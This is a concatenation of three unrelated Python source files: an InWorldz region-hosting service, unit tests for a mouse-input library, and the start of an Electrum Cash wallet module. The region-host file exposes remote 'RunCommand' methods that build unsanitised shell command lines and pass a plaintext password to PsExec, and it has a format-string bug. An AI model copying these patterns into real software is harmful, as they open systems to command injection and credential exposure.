GridService
import inworldz.maestro.environment.ComputeResource as ComputeResource
from inworldz.maestro.environment.RegionEntry import RegionState, RegionEntry
from inworldz.maestro import User
class RegionHost(ServiceBase):
"""Region Host Server"""
@classmethod
def instance(cls):
global inst
try:
inst
except:
hostid = RegionHost.create({})
inst = store.get(hostid, RegionHost.getClass())
inst.start()
return inst
@classmethod
def getClass(cls):
return "RegionHost"
@classmethod
def getMethods(cls):
methods = [
"IsSlotProvisioned",
"IsSlotFree",
"GetSlotDirectory",
"GetSlotConfiguration",
"ProvisionRegion",
"Shutdown",
"UpdateRegionToRevision",
"UpdateRegionToLatest",
"UpdateGridServicesToRevision",
"UpdateGridServicesToLatest",
"ReconfigureRegion",
"ReconfigureGridServices",
"RunCommand",
"RunCommandAs"
]
return ServiceBase.getMethods() + methods
@classmethod
def getAttrRO(cls):
attrs = [
"Regions",
"Memory",
"Disk",
"Cpu",
"Process",
"UserService",
"MessagingService",
"ApertureService",
"GridService",
"service_base_dir",
"slot_base_dir",
"max_slots",
"Flags"
]
return ServiceBase.getAttrRO() + attrs
@classmethod
def getAttrRW(cls):
attrs = [
"maintenance_mode",
]
return ServiceBase.getAttrRW() + attrs
@classmethod
def getFuncs(cls):
funcs = [
"GetAvailableReleases"
]
return ServiceBase.getFuncs() + funcs
def __init__(self, uuid, record={}):
ServiceBase.__init__(self, uuid, record)
self.props = DefaultProperties.instance()
self.set_maintenance_mode(record.get('maintenance_mode'))
self.host_memory = Memory(genuuid.createString())
self.host_disk = Disk(genuuid.createString())
self.host_cpu = Cpu(genuuid.createString())
self.process = Process(genuuid.createString())
self.maxRegionSlots = provision.GetMaxRegionSlots()
self.slotBaseDir = provision.GetSlotBaseDir()
self.serviceBaseDir = provision.GetServiceBaseDir()
self.regions = []
self.regions_lock = threading.RLock()
@classmethod
def create(cls, record):
uuid = genuuid.createString()
return (cls.recreate(record, uuid))
@classmethod
def recreate(cls, record, uuid):
service = RegionHost(uuid, record)
return (service.get_uuid())
@classmethod
def GetAvailableReleases(cls):
try:
props = DefaultProperties.instance()
gridshare_path = props.getValue("gridshare_path")
(username, password) = props.getGridShareCredentials()
ConnectUNCShare(gridshare_path, username, password)
return (provision.GetRevisions(gridshare_path))
except:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
raise ServiceError(exc_value)
def start(self):
# Initialize grid services
self.user_service_id = UserService.create({})
self.user_service = store.get(self.user_service_id, "UserService")
self.messaging_service_id = MessagingService.create({})
self.messaging_service = store.get(self.messaging_service_id, "MessagingService")
self.aperture_service_id = ApertureService.create({})
self.aperture_service = store.get(self.aperture_service_id, "ApertureService")
#if we should be hosting a grid service, fire that up too
if self.props.hostingResource.flags & ComputeResource.Flags.GridServiceHost == ComputeResource.Flags.GridServiceHost:
self.grid_service_id = GridService.create({})
self.grid_service = store.get(self.grid_service_id, "GridService")
else:
self.grid_service = None
# Initialize regions
for slot in range(self.maxRegionSlots):
if not provision.IsSlotProvisioned(slot):
continue
regionInfo = provision.GetSlotConfiguration(slot)
for region_uuid in regionInfo.keys():
record = regionInfo[region_uuid]
record['slot_number'] = slot
record['master_avatar_uuid'] = User.User.FindByName(record["master_avatar_first"],
record["master_avatar_last"])
try:
region = Region.recreate(record, region_uuid)
self.region_add(region)
except:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
pass
self.work_queue = Queue.Queue()
self.queue_runner = threading.Thread(target=self._processQueue, name="QueueRunner")
self.queue_runner.start()
self.poll_interval = 10.0;
self.monitor = threading.Thread(target=self._regionMonitor, name="RegionMonitor")
self.monitor.start()
def _processQueue(self):
print "QueueRunner Starting"
while True:
try:
objid = self.work_queue.get()
service = None
for classname in ["ApertureService", "UserService", "MessagingService", "GridService", "Region"]:
service = store.get(objid, classname)
if (service != None):
break
if service:
if service.ShouldBeRunning():
service.Start()
time.sleep(2) #prevents mono addins problems when services rapid-fire start
else:
print "QueueRunner: Unknown object type queued for service"
except:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
pass
finally:
self.work_queue.task_done()
def _regionMonitor(self):
print "RegionMonitor Starting"
while True:
try:
if (self.maintenance_mode == True):
continue
if (self.aperture_service.IsRunning() == False and self.aperture_service.ShouldBeRunning()):
self.work_queue.put(self.aperture_service_id)
if (self.user_service.IsRunning() == False and self.user_service.ShouldBeRunning()):
self.work_queue.put_nowait(self.user_service_id)
if (self.grid_service != None and self.grid_service.IsRunning() == False and self.grid_service.ShouldBeRunning()):
self.work_queue.put_nowait(self.grid_service_id)
if (self.messaging_service.IsRunning() == False and self.messaging_service.ShouldBeRunning()):
self.work_queue.put_nowait(self.messaging_service_id)
with self.regions_lock:
for region_uuid in self.regions:
region = store.get(region_uuid, "Region")
regionEntry = self.props.hostingResource.findHostedRegionByUUID(region_uuid)
if region == None or regionEntry == None:
continue
if regionEntry.state != RegionState.DeployedRunning:
continue
if (region.IsRunning() == False):
self.work_queue.put(region_uuid)
except:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
pass
finally:
time.sleep(self.poll_interval)
def Shutdown(self):
pass
def get_maintenance_mode(self):
return self.maintenance_mode
def set_maintenance_mode(self, mode):
self.maintenance_mode = bool(mode if mode != None else False)
return self.maintenance_mode
def region_add(self, region):
with self.regions_lock:
self.regions.append(region)
def region_del(self, region):
with self.regions_lock:
self.regions.remove(region)
def get_Memory(self):
return self.host_memory.get_uuid()
def get_Disk(self):
return self.host_disk.get_uuid()
def get_Cpu(self):
return self.host_cpu.get_uuid()
def get_Process(self):
return self.process.get_uuid()
def get_Regions(self):
with self.regions_lock:
return self.regions
def get_UserService(self):
return self.user_service_id
def get_MessagingService(self):
return self.messaging_service_id
def get_ApertureService(self):
return self.aperture_service_id
def get_GridService(self):
return self.grid_service_id
def get_service_base_dir(self):
return self.serviceBaseDir
def get_slot_base_dir(self):
return self.slotBaseDir
def get_max_slots(self):
return self.maxRegionSlots
def get_Flags(self):
return self.props.hostingResource.flags;
def IsSlotProvisioned(self, slotnum):
return (provision.IsSlotProvisioned(slotnum))
def IsSlotFree(self, slotnum):
return (provision.IsSlotFree(slotnum))
def GetSlotDirectory(self, slotnum):
return (provision.GetSlotDirectory(slotnum))
def GetSlotConfiguration(self, slotnum):
return (provision.GetSlotConfiguration(slotnum))
def ProvisionRegion(self, record):
""" Set up a new region in the resource pool provided by this host
sim_name - The name of the new region to provision
sim_location_x - The x location on the map for the new region
sim_location_y - The y location on the map for the new region
master_avatar_uuid - The user that owns this new region
"""
for slotnum in range(self.maxRegionSlots):
if (self.IsSlotFree(slotnum)):
record['slot_number'] = slotnum
try:
region = Region.create(record)
#also record this provisioning to the environment
regEntry = RegionEntry(region.sim_uuid, region.sim_name, region.master_avatar_uuid, \
region.estate_id, region.get_region_product(), \
region.sim_location_x, region.sim_location_y, \
self.props.hostingResource.dbid, \
RegionState.SetupInProgress)
self.props.hostingResource.registerNewRegion(regEntry)
region.associateWithRegionEntry()
self.region_add(region.get_uuid())
return region.get_uuid()
except:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
raise ServiceError(exc_value)
""" No slots found available. tell them """
raise ServiceError("No region slot is available")
def UpdateRegionToRevision(self, region_uuid, revision):
""" Update the region to the revision specified. """
region = store.get(region_uuid, Region.getClass())
if (region == None):
raise ServiceError("Invalid Region Specified")
if (region.IsRunning()):
raise ServiceError("Cannot update a running region.")
try:
target = region.get_slot_directory()
gridshare_path = self.props.getValue("gridshare_path")
(username, password) = self.props.getGridShareCredentials()
ConnectUNCShare(gridshare_path, username, password)
return (provision.ProvisionFromRevision(gridshare_path, target, revision))
except:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
raise ServiceError(exc_value)
def UpdateRegionToLatest(self, region_uuid):
""" Update the region to the latest revision. """
region = store.get(region_uuid, Region.getClass())
if (region == None):
raise ServiceError("Invalid Region Specified")
if (region.IsRunning()):
raise ServiceError("Cannot update a running region.")
try:
target = region.get_slot_directory()
gridshare_path = self.props.getValue("gridshare_path")
(username, password) = self.props.getGridShareCredentials()
ConnectUNCShare(gridshare_path, username, password)
return (provision.ProvisionFromLatest(gridshare_path, target))
except:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
raise ServiceError(exc_value)
def UpdateGridServicesToRevision(self, revision):
""" Update the target to the revision specified. """
if (self.aperture_service.IsRunning()):
raise ServiceError("Update: Cannot update, aperture is running.")
if (self.messaging_service.IsRunning()):
raise ServiceError("Update: Cannot update, messaging service is running.")
if (self.user_service.IsRunning()):
raise ServiceError("Update: Cannot update, user service is running.")
try:
target = provision.GetServiceBaseDir()
gridshare_path = self.props.getValue("gridshare_path")
(username, password) = self.props.getGridShareCredentials()
ConnectUNCShare(gridshare_path, username, password)
return (provision.ProvisionFromRevision(gridshare_path, target, revision))
except:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
raise ServiceError(exc_value)
def UpdateGridServicesToLatest(self):
""" Update the grid services to the latest revision. """
if (self.aperture_service.IsRunning()):
raise ServiceError("Update: Cannot update, aperture is running.")
if (self.messaging_service.IsRunning()):
raise ServiceError("Update: Cannot update, messaging service is running.")
if (self.user_service.IsRunning()):
raise ServiceError("Update: Cannot update, user service is running.")
try:
target = provision.GetServiceBaseDir()
gridshare_path = self.props.getValue("gridshare_path")
(username, password) = self.props.getGridShareCredentials()
ConnectUNCShare(gridshare_path, username, password)
return (provision.ProvisionFromLatest(gridshare_path, target))
except:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
raise ServiceError(exc_value)
def ReconfigureRegion(self, region_uuid):
""" Retrieves the most up to date configuration templates, and regenerates
configuration files. The region must be down for this to succeed. """
region = store.get(region_uuid, Region.getClass())
if (region == None):
raise ServiceError("Invalid Region Specified")
if (region.IsRunning()):
raise ServiceError("Cannot reconfigure a running region.")
region_record = region.get_record()
slotnum = region.get_slot_number()
regionBaseDir = os.path.join(region.get_slot_directory(), "bin")
regionConfigDir = os.path.join(region.get_slot_directory(), "bin", "Regions")
try:
os.makedirs(regionConfigDir)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(regionConfigDir):
pass
else:
raise ServiceError("Region destination directory doesn't exist")
dbconfig = self.props.getCoreDbConfig()
region_uuid = region.get_sim_uuid()
rdbHost = GetRdbHost(dbconfig, region_uuid)
if (rdbHost == None):
# no info? that's ok in this case we assign
print "RDB server not assigned for {0}, assigning new slot".format(region_uuid)
rdbHost = AssignBestRdbHost(dbconfig, region_uuid)
if ((not 'http_listener_port' in region_record) or (region_record['http_listener_port'] == "{REQUIRE}")):
region_record['http_listener_port'] = str(self.props.getInteger('starting_http_port') + slotnum)
if ((not 'internal_ip_port' in region_record) or (region_record['internal_ip_port'] == "{REQUIRE}")):
region_record['internal_ip_port'] = str(self.props.getInteger('starting_udp_port') + slotnum)
if ((not 'rdb_host' in region_record) or (region_record['rdb_host'] == "{REQUIRE}")):
region_record['rdb_host'] = rdbHost
# Check for REQUIRE items and do the replacements if needed
keys = dict(self.props.getItems(vars=region_record))
# Map the source drive and figure out if its on GridShare
regionConfigName = region.get_name_label() + ".xml"
(username, password) = self.props.getGridShareCredentials()
templateBaseDir = self.props.getValue("template_basedir")
try:
ConnectUNCShare(templateBaseDir, username, password)
""" Read in Region Config Settings """
keys = provision.GetConfiguration(templateBaseDir, "simulation.config", "simulation", keys)
""" Update the Region Configuration First """
provision.ReconfigureRegion(templateBaseDir, regionConfigDir, regionConfigName, keys)
""" Now do the Simulator Configuration Files """
provision.ReconfigureSimulator(templateBaseDir, regionBaseDir, keys)
""" Done"""
return True
except Exception, e:
raise ServiceError("Reconfiguration failed: " + str(e))
def ReconfigureGridServices(self):
""" Retrieves the most up to date configuration templates, and regenerates
configuration files. The grid services must be down for this to succeed. """
if (self.aperture_service.IsRunning()):
raise ServiceError("Reconfigure: Cannot reconfigure, aperture is running.")
if (self.messaging_service.IsRunning()):
raise ServiceError("Reconfigure: Cannot reconfigure, messaging service is running.")
if (self.user_service.IsRunning()):
raise ServiceError("Reconfigure: Cannot reconfigure, user service is running.")
if (self.grid_service != None and self.grid_service.IsRunning()):
raise ServiceError("Reconfigure: Cannot reconfigure, grid service is running.")
serviceBaseDir = os.path.join(provision.GetServiceBaseDir(), "bin")
try:
os.makedirs(serviceBaseDir)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(serviceBaseDir):
pass
else:
raise ServiceError("Grid Services destination directory doesn't exist")
defaults = {}
defaults['http_listener_port'] = str(self.props.getInteger('starting_http_port'))
defaults['internal_ip_port'] = str(self.props.getInteger('starting_udp_port'))
keys = dict(self.props.getItems(vars=defaults))
# Map the source drive and figure out if its on GridShare
(username, password) = self.props.getGridShareCredentials()
templateBaseDir = self.props.getValue("template_basedir")
try:
ConnectUNCShare(templateBaseDir, username, password)
""" Read in Region Config Settings """
keys = provision.GetConfiguration(templateBaseDir, "simulation.config", "simulation", keys)
provision.ReconfigureSimulator(templateBaseDir, serviceBaseDir, keys)
""" Done"""
return True
except Exception:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
return False
""" Returns a process object for when one is neeeded """
def RunCommandEx(self, cwd, cmd, cmdargs):
try:
cmdline = "{0} {1}".format(cmd, cmdargs)
p = psutil.Popen(cmdline, close_fds=True, cwd=cwd, creationflags=subprocess.CREATE_NEW_CONSOLE)
return p
except Exception:
return None
def RunCommand(self, cwd, cmd, cmdargs):
self.RunCommandEx(cwd, cmd, cmdargs)
""" Use PsExec to run the command """
def RunCommandAsEx(self, username, password, cwd, cmd, cmdargs):
try:
cmdline = "PsExec -u {0} -p {1} {2} {3}".format(username, password, cwd, cmd, cmdargs)
p = psutil.Popen(cmdline, close_fds=True, cwd=cwd, creationflags=subprocess.CREATE_NEW_CONSOLE)
return p
except Exception:
return None
def RunCommandAs(self, username, password, cwd, cmd, cmdargs):
self.RunCommandAsEx(username, password, cwd, cmd, cmdargs)
|
_mouse_tests.py
|
# -*- coding: utf-8 -*-
import unittest
import time
from ._mouse_event import MoveEvent, ButtonEvent, WheelEvent, LEFT, RIGHT, MIDDLE, X, X2, UP, DOWN, DOUBLE
import mouse
class FakeOsMouse(object):
def __init__(self):
self.append = None
self.position = (0, 0)
self.queue = None
self.init = lambda: None
def listen(self, queue):
self.listening = True
self.queue = queue
def press(self, button):
self.append((DOWN, button))
def release(self, button):
self.append((UP, button))
def get_position(self):
return self.position
def move_to(self, x, y):
self.append(('move', (x, y)))
self.position = (x, y)
def wheel(self, delta):
self.append(('wheel', delta))
def move_relative(self, x, y):
self.position = (self.position[0] + x, self.position[1] + y)
class TestMouse(unittest.TestCase):
@staticmethod
def setUpClass():
mouse._os_mouse= FakeOsMouse()
mouse._listener.start_if_necessary()
assert mouse._os_mouse.listening
def setUp(self):
self.events = []
mouse._pressed_events.clear()
mouse._os_mouse.append = self.events.append
def tearDown(self):
mouse.unhook_all()
# Make sure there's no spill over between tests.
self.wait_for_events_queue()
def wait_for_events_queue(self):
mouse._listener.queue.join()
def flush_events(self):
self.wait_for_events_queue()
events = list(self.events)
# Ugly, but requried to work in Python2. Python3 has list.clear
del self.events[:]
return events
def press(self, button=LEFT):
mouse._os_mouse.queue.put(ButtonEvent(DOWN, button, time.time()))
self.wait_for_events_queue()
def release(self, button=LEFT):
mouse._os_mouse.queue.put(ButtonEvent(UP, button, time.time()))
self.wait_for_events_queue()
def double_click(self, button=LEFT):
mouse._os_mouse.queue.put(ButtonEvent(DOUBLE, button, time.time()))
self.wait_for_events_queue()
def click(self, button=LEFT):
self.press(button)
self.release(button)
def wheel(self, delta=1):
mouse._os_mouse.queue.put(WheelEvent(delta, time.time()))
self.wait_for_events_queue()
def move(self, x=0, y=0):
mouse._os_mouse.queue.put(MoveEvent(x, y, time.time()))
self.wait_for_events_queue()
def test_hook(self):
events = []
self.press()
mouse.hook(events.append)
self.press()
mouse.unhook(events.append)
self.press()
self.assertEqual(len(events), 1)
def test_is_pressed(self):
self.assertFalse(mouse.is_pressed())
self.press()
self.assertTrue(mouse.is_pressed())
self.release()
self.press(X2)
self.assertFalse(mouse.is_pressed())
self.assertTrue(mouse.is_pressed(X2))
self.press(X2)
self.assertTrue(mouse.is_pressed(X2))
self.release(X2)
self.release(X2)
self.assertFalse(mouse.is_pressed(X2))
def test_buttons(self):
mouse.press()
self.assertEqual(self.flush_events(), [(DOWN, LEFT)])
mouse.release()
self.assertEqual(self.flush_events(), [(UP, LEFT)])
mouse.click()
self.assertEqual(self.flush_events(), [(DOWN, LEFT), (UP, LEFT)])
mouse.double_click()
self.assertEqual(self.flush_events(), [(DOWN, LEFT), (UP, LEFT), (DOWN, LEFT), (UP, LEFT)])
mouse.right_click()
self.assertEqual(self.flush_events(), [(DOWN, RIGHT), (UP, RIGHT)])
mouse.click(RIGHT)
self.assertEqual(self.flush_events(), [(DOWN, RIGHT), (UP, RIGHT)])
mouse.press(X2)
self.assertEqual(self.flush_events(), [(DOWN, X2)])
def test_position(self):
self.assertEqual(mouse.get_position(), mouse._os_mouse.get_position())
def test_move(self):
mouse.move(0, 0)
self.assertEqual(mouse._os_mouse.get_position(), (0, 0))
mouse.move(100, 500)
self.assertEqual(mouse._os_mouse.get_position(), (100, 500))
mouse.move(1, 2, False)
self.assertEqual(mouse._os_mouse.get_position(), (101, 502))
mouse.move(0, 0)
mouse.move(100, 499, True, duration=0.01)
self.assertEqual(mouse._os_mouse.get_position(), (100, 499))
mouse.move(100, 1, False, duration=0.01)
self.assertEqual(mouse._os_mouse.get_position(), (200, 500))
mouse.move(0, 0, False, duration=0.01)
self.assertEqual(mouse._os_mouse.get_position(), (200, 500))
def triggers(self, fn, events, **kwargs):
self.triggered = False
def callback():
self.triggered = True
handler = fn(callback, **kwargs)
for event_type, arg in events:
if event_type == DOWN:
self.press(arg)
elif event_type == UP:
self.release(arg)
elif event_type == DOUBLE:
self.double_click(arg)
elif event_type == 'WHEEL':
self.wheel()
mouse._listener.remove_handler(handler)
return self.triggered
def test_on_button(self):
self.assertTrue(self.triggers(mouse.on_button, [(DOWN, LEFT)]))
self.assertTrue(self.triggers(mouse.on_button, [(DOWN, RIGHT)]))
self.assertTrue(self.triggers(mouse.on_button, [(DOWN, X)]))
self.assertFalse(self.triggers(mouse.on_button, [('WHEEL', '')]))
self.assertFalse(self.triggers(mouse.on_button, [(DOWN, X)], buttons=MIDDLE))
self.assertTrue(self.triggers(mouse.on_button, [(DOWN, MIDDLE)], buttons=MIDDLE))
self.assertTrue(self.triggers(mouse.on_button, [(DOWN, MIDDLE)], buttons=MIDDLE))
self.assertFalse(self.triggers(mouse.on_button, [(DOWN, MIDDLE)], buttons=MIDDLE, types=UP))
self.assertTrue(self.triggers(mouse.on_button, [(UP, MIDDLE)], buttons=MIDDLE, types=UP))
self.assertTrue(self.triggers(mouse.on_button, [(UP, MIDDLE)], buttons=[MIDDLE, LEFT], types=[UP, DOWN]))
self.assertTrue(self.triggers(mouse.on_button, [(DOWN, LEFT)], buttons=[MIDDLE, LEFT], types=[UP, DOWN]))
self.assertFalse(self.triggers(mouse.on_button, [(UP, X)], buttons=[MIDDLE, LEFT], types=[UP, DOWN]))
def test_ons(self):
self.assertTrue(self.triggers(mouse.on_click, [(UP, LEFT)]))
self.assertFalse(self.triggers(mouse.on_click, [(UP, RIGHT)]))
self.assertFalse(self.triggers(mouse.on_click, [(DOWN, LEFT)]))
self.assertFalse(self.triggers(mouse.on_click, [(DOWN, RIGHT)]))
self.assertTrue(self.triggers(mouse.on_double_click, [(DOUBLE, LEFT)]))
self.assertFalse(self.triggers(mouse.on_double_click, [(DOUBLE, RIGHT)]))
self.assertFalse(self.triggers(mouse.on_double_click, [(DOWN, RIGHT)]))
self.assertTrue(self.triggers(mouse.on_right_click, [(UP, RIGHT)]))
self.assertTrue(self.triggers(mouse.on_middle_click, [(UP, MIDDLE)]))
def test_wait(self):
# If this fails it blocks. Unfortunately, but I see no other way of testing.
from threading import Thread, Lock
lock = Lock()
lock.acquire()
def t():
mouse.wait()
lock.release()
Thread(target=t).start()
self.press()
lock.acquire()
def test_record_play(self):
from threading import Thread, Lock
lock = Lock()
lock.acquire()
def t():
self.recorded = mouse.record(RIGHT)
lock.release()
Thread(target=t).start()
self.click()
self.wheel(5)
self.move(100, 50)
self.press(RIGHT)
lock.acquire()
self.assertEqual(len(self.recorded), 5)
self.assertEqual(self.recorded[0]._replace(time=None), ButtonEvent(DOWN, LEFT, None))
self.assertEqual(self.recorded[1]._replace(time=None), ButtonEvent(UP, LEFT, None))
self.assertEqual(self.recorded[2]._replace(time=None), WheelEvent(5, None))
self.assertEqual(self.recorded[3]._replace(time=None), MoveEvent(100, 50, None))
self.assertEqual(self.recorded[4]._replace(time=None), ButtonEvent(DOWN, RIGHT, None))
mouse.play(self.recorded, speed_factor=0)
events = self.flush_events()
self.assertEqual(len(events), 5)
self.assertEqual(events[0], (DOWN, LEFT))
self.assertEqual(events[1], (UP, LEFT))
self.assertEqual(events[2], ('wheel', 5))
self.assertEqual(events[3], ('move', (100, 50)))
self.assertEqual(events[4], (DOWN, RIGHT))
mouse.play(self.recorded)
events = self.flush_events()
self.assertEqual(len(events), 5)
self.assertEqual(events[0], (DOWN, LEFT))
self.assertEqual(events[1], (UP, LEFT))
self.assertEqual(events[2], ('wheel', 5))
self.assertEqual(events[3], ('move', (100, 50)))
self.assertEqual(events[4], (DOWN, RIGHT))
mouse.play(self.recorded, include_clicks=False)
events = self.flush_events()
self.assertEqual(len(events), 2)
self.assertEqual(events[0], ('wheel', 5))
self.assertEqual(events[1], ('move', (100, 50)))
mouse.play(self.recorded, include_moves=False)
events = self.flush_events()
self.assertEqual(len(events), 4)
self.assertEqual(events[0], (DOWN, LEFT))
self.assertEqual(events[1], (UP, LEFT))
self.assertEqual(events[2], ('wheel', 5))
self.assertEqual(events[3], (DOWN, RIGHT))
mouse.play(self.recorded, include_wheel=False)
events = self.flush_events()
self.assertEqual(len(events), 4)
self.assertEqual(events[0], (DOWN, LEFT))
self.assertEqual(events[1], (UP, LEFT))
self.assertEqual(events[2], ('move', (100, 50)))
self.assertEqual(events[3], (DOWN, RIGHT))
if __name__ == '__main__':
unittest.main()
|
wallet.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Wallet classes:
# - ImportedAddressWallet: imported address, no keystore
# - ImportedPrivkeyWallet: imported private keys, keystore
# - Standard_Wallet: one keystore, P2PKH
# - Multisig_Wallet: several keystores, P2SH
import copy
import errno
import json
import itertools
import os
import queue
import random
import threading
import time
from collections import defaultdict, namedtuple
from enum import Enum, auto
from functools import partial
from typing import Set, Tuple, Union
from .i18n import ngettext
from .util import (NotEnoughFunds, ExcessiveFee, PrintError, UserCancelled, profiler, format_satoshis, format_time,
finalization_print_error, to_string, TimeoutException)
from .address import Address, Script, ScriptOutput, PublicKey, OpCodes
from .bitcoin import *
from .version import *
from .keystore import load_keystore, Hardware_KeyStore, Imported_KeyStore, BIP32_KeyStore, xpubkey_to_address
from . import networks
from . import keystore
from .storage import multisig_type, WalletStorage
from . import transaction
from .transaction import Transaction, InputValueMissing
from .plugins import run_hook
from . import bitcoin
from . import coinchooser
from .synchronizer import Synchronizer
from .verifier import SPV, SPVDelegate
from . import schnorr
from . import ecc_fast
from .blockchain import NULL_HASH_HEX
from . import paymentrequest
from .paymentrequest import InvoiceStore, PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
from .contacts import Contacts
from . import cashacct
from . import slp
def _(message): return message
TX_STATUS = [
_('Unconfirmed parent'),
_('Low fee'),
_('Unconfirmed'),
_('Not Verified'),
]
del _
from .i18n import _
DEFAULT_CONFIRMED_ONLY = False
def relayfee(network):
RELAY_FEE = 5000
MAX_RELAY_FEE = 50000
f = network.relay_fee if network and network.relay_fee else RELAY_FEE
return min(f, MAX_RELAY_FEE)
def dust_threshold(network):
# Change < dust threshold is added to the tx fee
#return 182 * 3 * relayfee(network) / 1000 # original Electrum logic
#return 1 # <-- was this value until late Sept. 2018
return 546 # hard-coded Bitcoin Cash dust threshold. Was changed to this as of Sept. 2018
def sweep_preparations(privkeys, network, imax=100):
class InputsMaxxed(Exception):
pass
def append_utxos_to_inputs(inputs, pubkey, txin_type):
if txin_type == 'p2pkh':
address = Address.from_pubkey(pubkey)
else:
address = PublicKey.from_pubkey(pubkey)
sh = address.to_scripthash_hex()
u = network.synchronous_get(('blockchain.scripthash.listunspent', [sh]))
for item in u:
if len(inputs) >= imax:
raise InputsMaxxed()
item['address'] = address
item['type'] = txin_type
item['prevout_hash'] = item['tx_hash']
item['prevout_n'] = item['tx_pos']
item['pubkeys'] = [pubkey]
item['x_pubkeys'] = [pubkey]
item['signatures'] = [None]
item['num_sig'] = 1
inputs.append(item)
def find_utxos_for_privkey(txin_type, privkey, compressed):
pubkey = bitcoin.public_key_from_private_key(privkey, compressed)
append_utxos_to_inputs(inputs, pubkey, txin_type)
keypairs[pubkey] = privkey, compressed
inputs = []
keypairs = {}
try:
for sec in privkeys:
txin_type, privkey, compressed = bitcoin.deserialize_privkey(sec)
find_utxos_for_privkey(txin_type, privkey, compressed)
# do other lookups to increase support coverage
if is_minikey(sec):
# minikeys don't have a compressed byte
# we lookup both compressed and uncompressed pubkeys
find_utxos_for_privkey(txin_type, privkey, not compressed)
elif txin_type == 'p2pkh':
# WIF serialization does not distinguish p2pkh and p2pk
# we also search for pay-to-pubkey outputs
find_utxos_for_privkey('p2pk', privkey, compressed)
elif txin_type == 'p2sh':
raise ValueError(_("The specified WIF key '{}' is a p2sh WIF key. These key types cannot be swept.").format(sec))
except InputsMaxxed:
pass
if not inputs:
raise ValueError(_('No inputs found. (Note that inputs need to be confirmed)'))
return inputs, keypairs
def sweep(privkeys, network, config, recipient, fee=None, imax=100, sign_schnorr=False):
inputs, keypairs = sweep_preparations(privkeys, network, imax)
total = sum(i.get('value') for i in inputs)
if fee is None:
outputs = [(TYPE_ADDRESS, recipient, total)]
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = config.estimate_fee(tx.estimated_size())
if total - fee < 0:
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d'%(total, fee))
if total - fee < dust_threshold(network):
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d\nDust Threshold: %d'%(total, fee, dust_threshold(network)))
outputs = [(TYPE_ADDRESS, recipient, total - fee)]
locktime = network.get_local_height()
tx = Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
tx.BIP_LI01_sort()
tx.sign(keypairs)
return tx
class Abstract_Wallet(PrintError, SPVDelegate):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
max_change_outputs = 3
def __init__(self, storage):
self.electrum_version = PACKAGE_VERSION
self.storage = storage
self.thread = None # this is used by the qt main_window to store a QThread. We just make sure it's always defined as an attribute here.
self.network = None
# verifier (SPV) and synchronizer are started in start_threads
self.synchronizer = None
self.verifier = None
self.weak_window = None # Some of the GUI classes, such as the Qt ElectrumWindow, use this to refer back to themselves. This should always be a weakref.ref (Weak.ref), or None
# CashAccounts subsystem. Its network-dependent layer is started in
# start_threads. Note: object instantiation should be lightweight here.
# self.cashacct.load() is called later in this function to load data.
self.cashacct = cashacct.CashAcct(self)
self.slp = slp.WalletData(self)
finalization_print_error(self.cashacct) # debug object lifecycle
finalization_print_error(self.slp) # debug object lifecycle
# Removes defunct entries from self.pruned_txo asynchronously
self.pruned_txo_cleaner_thread = None
# Cache of Address -> (c,u,x) balance. This cache is used by
# get_addr_balance to significantly speed it up (it is called a lot).
# Cache entries are invalidated when tx's are seen involving this
# address (address history chages). Entries to this cache are added
# only inside get_addr_balance.
# Note that this data structure is touched by the network and GUI
# thread concurrently without the use of locks, because Python GIL
# allows us to get away with such things. As such do not iterate over
# this dict, but simply add/remove items to/from it in 1-liners (which
# Python's GIL makes thread-safe implicitly).
self._addr_bal_cache = {}
# We keep a set of the wallet and receiving addresses so that is_mine()
# checks are O(logN) rather than O(N). This creates/resets that cache.
self.invalidate_address_set_cache()
self.gap_limit_for_change = 20 # constant
# saved fields
self.use_change = storage.get('use_change', True)
